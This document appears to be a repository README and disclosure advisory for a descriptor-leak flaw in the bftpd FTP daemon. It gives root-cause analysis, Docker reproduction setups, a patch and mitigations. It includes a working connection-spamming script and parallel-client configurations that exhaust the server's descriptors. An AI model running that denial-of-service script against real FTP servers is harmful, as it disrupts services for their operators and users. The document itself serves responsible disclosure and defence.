mrTomatolegit/bftpd-daemon-fd-leak
File descriptor leak vulnerability (CVE pending) in bftpd ≤6.4 daemon mode. Race condition in socket cleanup causes DoS through FD exhaustion. Includes complete analysis, reproduction steps, Docker environment, and patch.
bftpd File Descriptor Leak Vulnerability
Summary
A file descriptor leak vulnerability exists in bftpd versions up to and including 6.4 when running in daemon mode. The vulnerability allows unauthenticated attackers to exhaust file descriptors through rapid connection attempts, leading to denial of service.
CVE ID: Pending
CVSS Score: TBD
Affected Versions: bftpd ≤ 6.4
Attack Vector: Network, unauthenticated
Impact: Denial of Service
Description
When operating in daemon mode (-d or -D flags), bftpd fails to properly close file descriptors in the parent process after accepting client connections. This results in:
- Indefinite accumulation of open file descriptors
- TCP sockets stuck in
CLOSE_WAITstate - Eventual exhaustion of the process's
RLIMIT_NOFILElimit (typically 1024) - Server rejection of all new connections once the limit is reached
The vulnerability can be triggered by simply connecting and immediately disconnecting, requiring no authentication or protocol knowledge. Due to the timing-dependent nature of the underlying race condition, the vulnerability manifests in two scenarios:
- Single-threaded attacks on localhost: The microsecond-level latency of loopback connections allows the
accept()loop to create file descriptors faster than the asynchronous SIGCHLD handler can close them. - Parallel attacks over the network: Multiple simultaneous connections from remote hosts produce the same effect, as concurrent
accept()calls outpace the cleanup mechanism regardless of network latency.
In both cases, the fundamental issue is that file descriptor cleanup relies on asynchronous signal handling, which cannot keep pace with synchronous socket creation under sufficient load.
Note: This vulnerability only affects daemon mode (standalone mode), which is the maintainer's preferred deployment method. Inetd mode is not vulnerable.
Affected Versions
- bftpd 6.4 and earlier (daemon mode only)
- Tested on: 5.3, 5.4, 5.5, 5.6, 5.7, 5.8, 5.9, 6.0, 6.1, 6.2, 6.3, 6.4
- Inetd mode: NOT affected
Reproduction
Prerequisites
# Install bftpd (Arch Linux example)
pacman -S bftpd
# Or Debian/Ubuntu
apt-get install bftpdSteps to Reproduce
This demonstrates the single-threaded localhost exploitation. For a parallel network-based demonstration, see the Docker setup below.
Terminal 1 - Start bftpd in daemon mode:
bftpd -n -D
# Note the PIDTerminal 2 - Run connection spammer:
# spam_bftpd.py
import socket
target_ip = "127.0.0.1"
target_port = 21
print(f"Starting spam on {target_ip}:{target_port}...")
try:
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target_ip, target_port))
data = s.recv(1024) # Wait for 220 banner
if b"220" in data:
s.close()
except Exception:
pass
finally:
s.close()
except KeyboardInterrupt:
print("\nStopped by user.")Terminal 3 - Monitor file descriptor count:
# Replace $PID with bftpd's process ID
watch -n 0.1 "ls -l /proc/$PID/fd | wc -l"Expected Result
File descriptor count should remain stable (4-5 descriptors).
Actual Result
File descriptor count increases continuously. Within a few minutes:
- FD count climbs from 4 to 50+
lsofshows numerous sockets inCLOSE_WAITor orphaned state- Server eventually stops accepting connections when reaching
RLIMIT_NOFILE
Alternative: Docker-based Reproduction
For easier reproduction without installing bftpd on your host system, two Docker Compose configurations are provided:
Prerequisites: Port 21 must be available on your host machine (no other FTP server running).
Option 1: Localhost Single-Threaded Attack (docker-compose.yml)
Demonstrates the original discovery scenario - a single-threaded client on localhost exploiting the race condition through high-speed loopback connections.
Demonstrate the Vulnerability:
# Clean any previous containers
docker compose down
# Build vulnerable version (no patch applied)
docker compose build --no-cache
# Start and watch FD count increase
docker compose up
# Output will show FD count climbing over time
# CLOSE_WAIT sockets will accumulateVerify the Fix:
# Clean previous containers
docker compose down
# Build patched version (with fix applied)
APPLY_PATCH=true docker compose build --no-cache
# Start and watch FD count stay stable
APPLY_PATCH=true docker compose up
# Output will show FD count remains stable at 4-5
# No socket accumulation occursWhat this setup does:
- Uses
network_mode: hostfor true localhost connections - Single spam client connecting repeatedly via 127.0.0.1
- Demonstrates the microsecond-latency exploitation scenario
Option 2: Parallel Network Attack (docker-compose.parallel.yml)
Demonstrates that the vulnerability is network-exploitable through concurrent connections, simulating a realistic distributed attack.
Demonstrate the Vulnerability:
# Clean any previous containers
docker compose -f docker-compose.parallel.yml down
# Build vulnerable version (no patch applied)
docker compose -f docker-compose.parallel.yml build --no-cache
# Start and watch FD count increase
docker compose -f docker-compose.parallel.yml up
# Output will show FD count climbing over time from parallel attacksVerify the Fix:
# Clean previous containers
docker compose -f docker-compose.parallel.yml down
# Build patched version (with fix applied)
APPLY_PATCH=true docker compose -f docker-compose.parallel.yml build --no-cache
# Start and watch FD count stay stable
APPLY_PATCH=true docker compose -f docker-compose.parallel.yml up
# Output will show FD count remains stable at 4-5What this setup does:
- Uses Docker bridge networking (containers communicate over virtual network)
- Launches 4 parallel spam clients connecting simultaneously
- Demonstrates network-based exploitation regardless of latency
- More realistic attack scenario (distributed concurrent connections)
Both approaches isolate the vulnerable server and provide a clean, reproducible environment where both the bug and the fix can be demonstrated.
Evidence
Before Attack
$ lsof -p 1599915
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
bftpd 1599915 root cwd DIR 8,48 4096 2 /
bftpd 1599915 root rtd DIR 8,48 4096 2 /
bftpd 1599915 root txt REG 8,48 80064 395732 /usr/bin/bftpd
bftpd 1599915 root 0u CHR 1,3 0t0 4 /dev/null
bftpd 1599915 root 1u CHR 1,3 0t0 4 /dev/null
bftpd 1599915 root 2u CHR 1,3 0t0 4 /dev/null
bftpd 1599915 root 3u IPv4 15417400 0t0 TCP *:ftp (LISTEN)
During Attack (Partial Output)
$ lsof -p 1932715 | grep sock
bftpd 1932715 root 4u sock 0,8 0t0 17032146 protocol: TCP
bftpd 1932715 root 5u sock 0,8 0t0 17176695 protocol: TCP
bftpd 1932715 root 6u sock 0,8 0t0 17101131 protocol: TCP
[... 40+ more leaked sockets ...]
bftpd 1932715 root 29u IPv4 17776883 0t0 TCP localhost:ftp->localhost:44524 (CLOSE_WAIT)
bftpd 1932715 root 32u IPv4 17749009 0t0 TCP localhost:ftp->localhost:47960 (CLOSE_WAIT)
bftpd 1932715 root 34u IPv4 17859146 0t0 TCP localhost:ftp->localhost:53028 (CLOSE_WAIT)
[... continues accumulating ...]
Note: Leaked sockets initially appear in CLOSE_WAIT state, then transition to orphaned file descriptors showing only as protocol: TCP.
Root Cause Analysis
The Bug
In main.c lines 297-311, when the server accepts a connection and forks a child process, both the parent and child inherit copies of the socket file descriptor (main_sock). The child correctly uses its copy, but the parent never closes its copy:
while ((main_sock = accept(listensocket, (struct sockaddr *) &new, &my_length))) {
pid_t pid;
if (main_sock > 0) {
pid = fork();
if (!pid) { /* child */
close(0);
close(1);
close(2);
isparent = 0;
dup2(main_sock, fileno(stdin));
dup2(main_sock, fileno(stderr));
break;
} else { /* parent */
struct bftpd_childpid *tmp_pid = malloc(sizeof(struct bftpd_childpid));
tmp_pid->pid = pid;
tmp_pid->sock = main_sock; // Stored for later cleanup
bftpd_list_add(&child_list, tmp_pid);
// BUG: Parent never closes main_sock!
}
}
}The Race Condition
The parent stores the socket in a tracking list and relies on the SIGCHLD signal handler (line 153) to close it asynchronously when the child exits. This creates a critical race condition:
- Synchronous socket creation:
accept()loop creates new FDs in microseconds - Asynchronous cleanup: SIGCHLD handler fires after child exit, with signal delivery delays
- Accumulation: When connections arrive faster than the handler can process exits (either via fast localhost connections or parallel network connections), FDs accumulate
- Exploitability: Single-threaded on localhost, or parallel from any network location
SIGCHLD handler (too slow):
void handler_sigchld(int signum)
{
// ... zombie reaping ...
for (i = 0; i < bftpd_list_count(child_list); i++) {
childpid = bftpd_list_get(child_list, i);
if ( (childpid) && (childpid->pid == pid) ) {
close(childpid->sock); // Asynchronous cleanup - too late!
bftpd_list_del(&child_list, i);
free(childpid);
}
}
}Exploitation Scenarios
The vulnerability is timing-dependent and can be triggered in two ways:
Single-Threaded Attack (Localhost)
| Connection Type | Latency | Result |
|---|---|---|
| Localhost/loopback | Microseconds | accept() loop outruns SIGCHLD delivery -> FD accumulation |
| LAN | Sub-millisecond | Natural delays usually allow cleanup to keep pace |
| WAN | Milliseconds+ | Natural delays prevent accumulation with single-threaded attacks |
With a single-threaded connection spammer, the vulnerability manifests most readily on localhost due to the extremely low latency. Each connection completes in microseconds, allowing the accept() loop to cycle faster than the asynchronous SIGCHLD handler can perform cleanup.
Parallel Attack (Any Network)
When connections are opened in parallel from multiple threads or clients, the vulnerability becomes exploitable over any network (LAN/WAN), regardless of latency. Multiple simultaneous accept() calls create file descriptors concurrently, overwhelming the single-threaded SIGCHLD cleanup mechanism. This is the more realistic attack scenario, as attackers would naturally parallelize connection attempts to maximize impact.
The Docker reproduction environment demonstrates this by running 4 parallel spam clients, showing that the vulnerability is network-exploitable and not limited to localhost scenarios.
Technical Details
File Descriptor Lifecycle
accept()creates FDNin parent processfork()duplicates FDNto child process (both have independent copies)- Child uses FD
Nfor communication, eventually closes it - Parent should close FD
Nimmediately but doesn't - Parent stores FD
Ninchild_listfor deferred cleanup - SIGCHLD fires (eventually), handler closes parent's FD
N - If step 1 repeats before step 6 completes: FD leak
TCP State Behavior
- CLOSE_WAIT: Child closed its end, but parent's end still open
- Orphaned sockets: Parent FD reference lost before cleanup completes
- Both consume file descriptor slots despite being non-functional
Solution
Patch
Four coordinated changes eliminate the race condition by moving cleanup from asynchronous (signal handler) to synchronous (accept loop):
1. Remove socket field from struct (main.h:12)
struct bftpd_childpid
{
pid_t pid;
- int sock;
};2. Don't store socket in child list (main.c:310)
struct bftpd_childpid *tmp_pid = malloc(sizeof(struct bftpd_childpid));
tmp_pid->pid = pid;
- tmp_pid->sock = main_sock;
bftpd_list_add(&child_list, tmp_pid);3. Close socket immediately in parent (main.c:312)
} else { /* parent */
struct bftpd_childpid *tmp_pid = malloc(sizeof(struct bftpd_childpid));
tmp_pid->pid = pid;
bftpd_list_add(&child_list, tmp_pid);
+ close(main_sock); // FIX: Immediate synchronous cleanup
}4. Remove redundant close in SIGCHLD handler (main.c:153)
if ( (childpid) && (childpid->pid == pid) ) {
- close(childpid->sock);
bftpd_list_del(&child_list, i);
free(childpid);Why This Works
- Parent doesn't need the socket - only child communicates with client
- Synchronous cleanup - FD closed immediately in accept() loop, no race possible
- Fork semantics preserved - child retains its independent copy of the FD
- Deterministic behavior - no dependency on signal timing or delivery order
- TCP correctness - both ends now close properly (child's copy + parent's copy)
The fundamental fix: from asynchronous cleanup to synchronous cleanup, eliminates the race condition entirely.
Impact of Fix
- Complete elimination of file descriptor leak
- No CLOSE_WAIT socket accumulation
- Denial of service prevention
- Deterministic resource management
- Reduced SIGCHLD handler overhead (faster child reaping)
- No performance impact (close() is microseconds)
- Backward compatible with all deployment modes
Inetd Mode Safety
All changes are safe for inetd mode because:
- Bug only exists in daemon mode (
-d/-Dflags) - Inetd mode (
-iflag, default) skips entire daemon code block main_sock,child_list, and SIGCHLD handler are daemon-mode only- Inetd handles accept() and fork() externally before launching bftpd
- The bug never existed in inetd mode
Security Impact
Attack Characteristics:
- Complexity: Low (trivial to exploit)
- Authentication: None required
- Knowledge: No FTP protocol knowledge needed
- Resources: Minimal (can DoS server in seconds with parallel connections)
- Detection: Difficult (appears as normal connection attempts)
- Network: Exploitable from localhost (single-threaded) or remotely (parallel connections)
Real-World Impact:
- Public FTP servers: Vulnerable to unauthenticated DoS
- Hosting environments: Single malicious user can affect entire server
- Automated attacks: Scripts/bots connecting repeatedly trigger the bug
- Protocol testing tools: L* learning algorithms, fuzzers, scanners inadvertently trigger it
Mitigation (Until Patched)
If upgrading is not immediately possible:
-
Use inetd mode (not affected):
# In /etc/inetd.conf or systemd socket activation ftp stream tcp nowait root /usr/bin/bftpd bftpd -i -
Connection rate limiting:
# iptables example - limit to 10 connections/minute per IP iptables -A INPUT -p tcp --dport 21 -m state --state NEW \ -m recent --name ftp --set iptables -A INPUT -p tcp --dport 21 -m state --state NEW \ -m recent --name ftp --update --seconds 60 --hitcount 10 -j DROP -
Monitor and restart:
# Watchdog script (crude but effective) while true; do FD_COUNT=$(ls -l /proc/$(pidof bftpd)/fd | wc -l) if [ "$FD_COUNT" -gt 50 ]; then systemctl restart bftpd fi sleep 5 done
-
Increase RLIMIT_NOFILE:
# Reduces impact but doesn't fix root cause ulimit -n 65536
Timeline
- February 05, 2026: Vulnerability discovered during FTP protocol inference testing
- February 20, 2026: Root cause analysis completed
- February 23, 2026: Vendor notification
- TBD: CVE assignment
- TBD: Public disclosure
CVE Assignment
Since bftpd does not have a dedicated CNA (CVE Numbering Authority), a CVE request will need to be filed through MITRE using their CVE Request Form.
We are happy to handle this process if you would prefer, or we can provide any information needed if you would like to file it yourself. Please let us know how you would like to proceed.
Credits
Discovered by: Alexander Trifa
Institution: Télécom SudParis
Contact: alexander.trifa@polytechnique.edu (institutional), security@alexandertrifa.dev (permanent)
Research Supervisor: Olivier Levillain (olivier.levillain@telecom-sudparis.eu)
Discovered during Bachelor Thesis research on Active Automata Learning for network protocol analysis.
References
- bftpd homepage
- Source repository
- Affected code:
main.c(daemon mode accept loop and SIGCHLD handler)
Files
Patch and Fix
bftpd-fdleak.patch- Complete diff with changes
Reproduction and Testing
spam_bftpd.py- Proof of concept / reproducer scriptdocker-compose.yml- Localhost single-threaded reproduction environmentdocker-compose.parallel.yml- Parallel network attack reproduction environmentDockerfile.server- Builds vulnerable bftpd server (optionally applies patch)Dockerfile.client- Builds spam client container
Disclaimer: This vulnerability information is provided for defensive purposes. Unauthorized testing against systems you do not own or have permission to test is illegal.